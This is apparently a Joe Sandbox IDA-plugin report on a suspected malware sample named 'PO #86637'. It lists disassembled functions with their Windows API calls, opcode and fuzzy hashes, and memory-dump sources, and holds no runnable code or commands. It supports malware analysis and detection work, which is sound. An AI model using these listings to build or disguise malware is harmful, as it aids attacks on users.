                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteMenuObject$IconWindow
                      • String ID:
                      • API String ID: 752480666-0
                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                      • String ID:
                      • API String ID: 3275902921-0
                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                      • String ID:
                      • API String ID: 3275902921-0
                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                      APIs
                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                      APIs
                      • SendMessageW.USER32 ref: 004555C7
                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                      • DeleteObject.GDI32(?), ref: 00455736
                      • DeleteObject.GDI32(?), ref: 00455744
                      • DestroyIcon.USER32(?), ref: 00455752
                      • DestroyWindow.USER32(?), ref: 00455760
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                      • String ID:
                      • API String ID: 3691411573-0
                      • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                      • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                      • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                      • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                      APIs
                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                      • LineTo.GDI32(?,?,?), ref: 004472AC
                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                      • LineTo.GDI32(?,?,?), ref: 004472C6
                      • EndPath.GDI32(?), ref: 004472D6
                      • StrokePath.GDI32(?), ref: 004472E4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                      • String ID:
                      • API String ID: 372113273-0
                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                      APIs
                      • GetDC.USER32(00000000), ref: 0044CC6D
                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CapsDevice$Release
                      • String ID:
                      • API String ID: 1035833867-0
                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                      APIs
                      • __getptd.LIBCMT ref: 0041708E
                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                      • __amsg_exit.LIBCMT ref: 004170AE
                      • __lock.LIBCMT ref: 004170BE
                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                      • _free.LIBCMT ref: 004170EE
                      • InterlockedIncrement.KERNEL32(02EE2CE0), ref: 00417106
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                      • String ID:
                      • API String ID: 3470314060-0
                      • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                      • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                      APIs
                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                      • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                      • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                      • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                      APIs
                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                      • ExitThread.KERNEL32 ref: 004151ED
                      • __freefls@4.LIBCMT ref: 00415209
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                      • String ID:
                      • API String ID: 442100245-0
                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                      APIs
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                      • _wcslen.LIBCMT ref: 0045F94A
                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                      • String ID: 0
                      • API String ID: 621800784-4108050209
                      • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                      • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • SetErrorMode.KERNEL32 ref: 004781CE
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                      • SetErrorMode.KERNEL32(?), ref: 00478270
                      • SetErrorMode.KERNEL32(?), ref: 00478340
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                      • String ID: \VH
                      • API String ID: 3884216118-234962358
                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                      APIs
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                      • IsMenu.USER32(?), ref: 0044854D
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                      • DrawMenuBar.USER32 ref: 004485AF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Item$DrawInfoInsert
                      • String ID: 0
                      • API String ID: 3076010158-4108050209
                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$_memmove_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 1589278365-1403004172
                      • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                      • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                      • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                      • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Handle
                      • String ID: nul
                      • API String ID: 2519475695-2873401336
                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                      APIs
